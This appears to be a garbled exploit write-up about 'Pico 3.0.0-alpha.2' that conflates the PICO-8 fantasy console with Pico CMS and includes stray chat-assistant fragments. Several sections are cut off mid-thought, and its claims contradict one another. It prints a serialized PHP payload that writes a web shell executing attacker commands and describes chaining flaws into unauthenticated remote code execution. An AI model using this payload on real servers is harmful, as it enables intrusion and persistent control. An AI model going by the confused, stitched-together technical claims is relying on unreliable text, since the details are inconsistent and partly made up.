If you’ve found an actual vulnerability in pico-3.0.0-alpha.2:
If you meant a different “Pico” (e.g., PicoScope, Pico SDK, a hardware tool), please clarify — I’ll adjust the guidance accordingly.
This write-up describes a preprocessor bypass exploit identified in Pico 3.0.0-alpha.2, specifically within the context of the PICO-8 fantasy console's scripting environment. Vulnerability Overview
The vulnerability resides in the PICO-8 preprocessor, which handles syntax extensions (like +=, shorthand if, and ?). Due to how the preprocessor handles multiline strings, an attacker can craft code that "escapes" a string after the preprocessing phase, allowing for arbitrary code execution while significantly reducing token costs for the script. Vulnerability Type: Preprocessor Bypass / Logic Flaw Affected Version: Pico 3.0.0-alpha.2 Impact: Arbitrary code execution and token limit bypass. Exploit Mechanism
The exploit leverages a discrepancy in how the preprocessor treats multiline strings compared to how the final Lua interpreter executes them.
Initial State (Pre-Patch): The malicious code is placed inside a multiline string. To the preprocessor, this counts as a single token.
The Flaw: The preprocessor is "non-syntax-aware." By using specific character sequences, the attacker tricks the preprocessor into terminating the string early or failing to recognize it as a string during its "patching" phase.
Final State (Post-Patch): After the preprocessor finishes its pass, the code that was supposedly inside a string is now treated as regular, executable code by the PICO-8 engine. Proof of Concept (PoC) Pico 3.0.0-alpha.2 Exploit
According to community research on Google Groups, the exploit allows running any code that fits on one line and avoids specific PICO-8 shorthand (like += or ?).
Token Cost: Only 8 tokens (vs. the hundreds a complex script might usually cost). Sample Trigger:
-- The preprocessor sees a string, but the patched version executes: [=[ exploit_code_here ]=] Use code with caution. Copied to clipboard
(Note: The exact character sequence depends on the specific preprocessor "weirdness" mentioned in the alpha.2 release notes.) Impact & Remediation
Security Risk: In a shared environment (like a BBS or education platform), this could lead to unintended script behavior or "impossible" cartridges that exceed standard hardware limits.
Status: Development of the original Pico project has largely ceased. While Pico 3.0.0-alpha.2 was released as a fix for certain fatal errors (such as unparenthesized #608), it introduced or retained these preprocessor quirks.
Recommendation: Users are advised to migrate to more actively maintained flat-file systems or engines like Grav CMS or HTMLy if using Pico as a web CMS. For PICO-8 developers, avoid using unofficial alpha builds for production cartridges. If you’ve found an actual vulnerability in pico-3
To understand how this exploit evolved, review the timeline:
A more advanced payload replaces the system call with a full PHP reverse shell or a web-based file manager.
!php/object "O:1:\"S\":1:s:4:\"exec\";s:62:\"file_put_contents('shell.php','<?php system($_GET[\"cmd\"]); ?>')\";"
Once shell.php is written, the attacker has permanent access.
The first step for an attacker is confirming the alpha version. Pico 3.0.0-alpha.2 exposes a distinct header and a debug route:
Once confirmed, the attacker probes for the Twig sandbox misconfiguration.
The vulnerability exists in the Pico::getPageData() method. In versions prior to 3.0.0, user input was sanitized strictly. However, in 3.0.0-alpha.2, the developers introduced a performance optimization that caches compiled Twig templates based on file modification times.
The exploit works as follows:
Pico CMS (stable) has a good track record of flat-file security, but alpha versions are outside that guarantee. The project’s SECURITY.md file (if present) outlines reporting procedures. Historically, the maintainers respond to responsible disclosures but focus on stable releases.
As of this writing, Pico 3.0.0-alpha.2 has not received an official CVE ID, primarily because the Pico CMS team explicitly warns that alpha versions are "not for production use." However, security researchers have cataloged the exploit under third-party advisories.
The primary attack vectors identified in this version include:
The most dangerous exploit chains the first two vulnerabilities together, achieving Remote Code Execution (RCE) without authentication.
Warning: The following is for educational and defensive purposes only.
An attacker can trigger the exploit with a single curl command. The goal is to inject a PHP web shell into the Twig cache file.